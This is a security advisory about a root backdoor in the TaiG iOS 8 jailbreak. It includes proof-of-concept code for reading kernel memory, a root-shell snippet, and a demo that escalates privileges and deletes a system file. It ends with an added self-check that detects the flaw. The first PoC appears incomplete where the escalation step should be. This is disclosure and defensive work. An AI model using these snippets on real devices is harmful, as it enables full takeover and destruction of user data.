Tai Chi (TaiG) jailbreak: major security backdoor vulnerability warning - myhack58

ID MYHACK58:62201564287
Type myhack58
Reporter Anonymous
Modified 2015-07-03T00:00:00


The Tai Chi (TaiG) jailbreak for iOS 8.1.3 to 8.4 contains a major security backdoor: after jailbreaking, any app can escalate its privileges to root, which endangers the user's data. With root, an app has full control over system files and can go further, for example installing Trojans or other malware that seriously threaten the user's security.

0x01 Details

Analysis shows that the TaiG jailbreak modifies the key system API setreuid, so that any app can call setreuid(0,0) directly and run as root. It can then modify any system file, and it can also use task_for_pid to obtain the kernel task port and fully control the lowest layer of the system. For example, by writing to the system directory /Library/LaunchDaemons it can register a system service and implant a Trojan, virus or hacking tool that threatens the user's private data and passwords.

The vulnerability is reproduced in the demonstrations below:

[Screenshot] Example 1: the test_taig_backdoor1 program reads kernel memory
[Screenshot] Example 2: test_taig_backdoor2 obtains a root shell

PoC code for test_taig_backdoor, which reads arbitrary kernel memory:
#import <Foundation/Foundation.h>
#include <mach/mach.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Read 128 bytes of kernel memory at addr through the kernel task port (tfp0). */
void dump_kernel_memory(vm_address_t addr)
{
    kern_return_t kret;
    mach_port_t proc_task = 0;
    vm_size_t ret_size = 0;
    vm_size_t i;
    char buffer[128] = {0};
    int ret;

    /* pid 0 is the kernel; task_for_pid(0) is only granted to a root process */
    ret = task_for_pid(mach_task_self(), 0, &proc_task);
    if (ret != 0) {
        NSLog(@"[err] get tfp0 fail: %d", ret);
        return;
    }

    NSLog(@"task for pid 0 = %u", proc_task);

    kret = vm_read_overwrite(proc_task, addr, sizeof(buffer), (vm_address_t)buffer, &ret_size);
    if (kret != KERN_SUCCESS) {
        NSLog(@"[err] vm_read_overwrite fail: %d", kret);
        return;
    }

    /* hex dump, 16 bytes per line */
    char *info = malloc(4096);
    info[0] = '\0';
    for (i = 0; i < ret_size; i++) {
        if (i % 16 == 0)
            sprintf(info + strlen(info), "\n%p: ", (void *)(addr + i));
        sprintf(info + strlen(info), "0x%02x ", *(uint8_t *)(buffer + i));
    }
    NSLog(@"%s", info);

    free(info);
}

int main(int argc, const char *argv[])
{
    if (argc != 2) {
        NSLog(@"%s [kernel_address]", argv[0]);
        return 0;
    }

    NSLog(@"current uid=%d euid=%d", getuid(), geteuid());

    /* taig virus test */

    NSLog(@"now uid=%d euid=%d", getuid(), geteuid());

    vm_address_t addr = strtoul(argv[1], NULL, 16);
    dump_kernel_memory(addr);

    return 0;
}

PoC code for test_taig_backdoor2, which escalates privileges:

void get_root_shell(void)
{
    setreuid(0, 0);
    system("/bin/bash -i");
}

Add the following code to an app to test deleting a file (execute with care):

void testBackdoor(void)
{
    NSLog(@"current process uid=%d euid=%d", getuid(), geteuid());
    setreuid(0, 0);
    NSLog(@"after escalating through the backdoor, current process uid=%d euid=%d", getuid(), geteuid());

    NSLog(@"deleting an arbitrary file as a demo; this will leave Cydia unable to run, execute with care");
    unlink("/Applications/Cydia.app/MobileCydia");
}

The TaiG jailbreak for iOS 8.0 to 8.1.1 could not be tested because no such device was available; it may contain the same major backdoor.

0x02 Summary

A security backdoor in jailbreak software is not without precedent. As early as the iOS 7 untethered jailbreak tool evasi0n7, the jailbreak developers evad3rs modified system call number 0, so that any app could easily gain kernel code execution. This practice drew strong criticism from the well-known jailbreak researcher winocm (http://winocm.moe/projects/research/2014/01/11/evading-ios-security/a). Back in 2014, winocm's blog post already questioned whether TaiG was using this backdoor. The quarrel between TaiG and evad3rs has never stopped. According to Forbes (http://www.forbes.com/sites/thomasbrewster/2015/06/26/china-iphone-jailbreak-industry/) and a report on 163.com (http://mobile.163.com/15/0630/10/ATBNV93H0011671M.html), TaiG paid evad3rs up to a million dollars to cooperate on jailbreak development, and the product of that cooperation was the farce of evasi0n7 force-installing the "TaiG Assistant". Whether the security backdoor in the TaiG jailbreak is a repeat offence or a first offence is a question that will probably never be answered.
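An added illustration (not from the advisory, and not TaiG's or Apple's code) of the check that setreuid is supposed to enforce and that the patched API skips: setreuid_allowed models the unprivileged-case rule that a requested real or effective uid must already be one of the caller's real, effective or saved uids, and probe_setreuid_backdoor is a self-check that reports whether the running process can reach uid 0 through setreuid(0,0), the same call the PoCs above rely on. The model is a simplification of the kernel's real check, and uid 501 (the iOS "mobile" user) is assumed for the printed example.

```c
/* Added example (not code from the advisory): a minimal model of the setreuid
 * permission check an intact kernel applies, plus a self-check that reports
 * whether this process can reach uid 0 through setreuid(0,0) without privilege. */
#include <errno.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Simplified model of the unprivileged-case check in setreuid(): a requested
 * real or effective uid is accepted only if it is -1 (unchanged) or already one
 * of the caller's real, effective or saved uids; only euid 0 may pick any value.
 * A backdoored setreuid skips this check, so any app may ask for (0,0). */
static int uid_is_own(uid_t want, uid_t ruid, uid_t euid, uid_t suid) {
    return want == (uid_t)-1 || want == ruid || want == euid || want == suid;
}

int setreuid_allowed(uid_t ruid, uid_t euid, uid_t suid,
                     uid_t new_ruid, uid_t new_euid) {
    if (euid == 0)
        return 1;                         /* privileged caller */
    return uid_is_own(new_ruid, ruid, euid, suid) &&
           uid_is_own(new_euid, ruid, euid, suid);
}

enum probe_result { PROBE_SKIPPED_ROOT, PROBE_DENIED, PROBE_BACKDOOR,
                    PROBE_OTHER_ERROR };
/* Live self-check: from an unprivileged process, request (0,0) exactly as the
 * advisory's PoC does. An intact kernel answers EPERM; success means the
 * setreuid backdoor is present. The original uid is restored afterwards. */
enum probe_result probe_setreuid_backdoor(void) {
    uid_t orig = getuid();
    if (orig == 0)
        return PROBE_SKIPPED_ROOT;        /* nothing to learn when already root */
    if (setreuid(0, 0) == 0) {
        setreuid(orig, orig);             /* drop back; euid is 0, so this succeeds */
        return PROBE_BACKDOOR;
    }
    return errno == EPERM ? PROBE_DENIED : PROBE_OTHER_ERROR;
}

int main(void) {
    static const char *verdict[] = { "skipped (already root)", "denied (EPERM)",
        "BACKDOOR: setreuid(0,0) succeeded", "other error" };
    /* Model verdict for the iOS "mobile" user (uid 501, assumed) asking for (0,0) */
    printf("model: mobile -> (0,0): %s\n",
           setreuid_allowed(501, 501, 501, 0, 0) ? "allowed" : "denied");
    printf("live probe: %s\n", verdict[probe_setreuid_backdoor()]);
    return 0;
}
```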